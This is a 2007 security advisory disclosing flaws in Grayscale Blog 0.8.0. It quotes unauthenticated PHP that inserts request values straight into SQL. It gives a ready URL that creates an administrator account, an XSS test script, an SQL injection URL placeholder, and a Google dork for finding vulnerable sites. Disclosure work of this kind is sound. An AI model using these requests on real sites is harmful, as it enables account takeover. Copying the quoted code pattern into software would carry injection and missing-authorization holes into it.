Grayscale <= 0.8.0 Multiple Vulnerabilities
# Security Advisory - Multiple Vulnerabilities in Grayscale Blog 0.8.0 #
Date : 2007-02-24
Product : Grayscale Blog
Version : 0.8.0 - Prior version maybe also be affected
Vendor : http://sourceforge.net/projects/gsblogger/ -
http://www.karlcore.com/programming/blog/
Vendor Status : 2007-02-24 -> Not Informed!
2007-03-02 -> Contacted, waiting reply!
2007-03-09 -> Vendor never replyed
Source : omnipresent - omni
E-mail : omnipresent[at]email[dot]it
Google Dork : "Powered by Grayscale Blog"
Security Issues :
1.) Security Query Bypass: [TESTED]
A user can do lots of stuff with some php scripts located in the directory
"/scripts/", for example:
add_user.php - Security Bypass
// $user_id=$_REQUEST['user_id']; // not used
$user_loginname=$_REQUEST['user_loginname'];
$user_password=$_REQUEST['user_password'];
$user_real_name=$_REQUEST['user_real_name'];
$user_email=$_REQUEST['user_email'];
// $user_date_added=$_REQUEST['user_date_added']; // not used
// $user_lastmod=$_REQUEST['user_lastmod']; // not used
$user_permissions=$_REQUEST['user_permissions'];
$user_added_by=$_REQUEST['user_added_by'];
$user_lastmod_by=$_REQUEST['user_lastmod_by'];
$user_allow=$_REQUEST['user_allow'];
// define the query
$query = "INSERT INTO blog_users (user_loginname, user_password,
user_real_name, user_email, user_date_added, user_lastmod, user_permissions,
user_added_by, user_lastmod_by, user_allow )
values ('$user_loginname', '$user_password', '$user_real_name',
'$user_email', NOW(), NOW(), '$user_permissions', '$user_added_by',
'$user_lastmod_by', '$user_allow')";
As you can see the code there are no security restriction for any users!!
Everyone can add a user with Administrator Privilege ($user_permissions = 3).
Other files affected by some security issues, like the above, are:
-addblog.php
-editblog.php
-editlinks.php
-edit_users.php
-add_links.php
Example:
http://vulnerable_server/path/scripts/add_users.php?user_loginname=HACK_USER&user_password=HACK_USER&user_real_name=real&user_email=os@xxxxxx&user_permissions=3&user_added_by=1&user_lastmod_by=1&user_allow=1
And you have admin rights!
2.) XSS Vulnerability: [TESTED]
Security issue in the following files:
-"/scripts/addblog_comment.php" -> variables are not properly sanitized before
being used in the query string
-"detail.php" -> variables are not properly sanitized before being used in the
query string (query2 -> blog_comments)
Example:
You can put in the comment fields the following script:
<script>alert("XSS")</script>
3.) SQL Injection vulnerability: [NOT TESTED]
In lots of files variables are not properly sanitized before being used, these
files are, for example:
-userdetail.php -> id variable
-jump.php -> id variable and url variable for our redirect
-detail.php -> id variable
Example:
http://vulnerable_server/path/detail.php?id=1;[SQL INJECTION]
.:. Patches:
0x0 No vendor patches released!
0x1 Edit the source code to ensure that input is properly verified.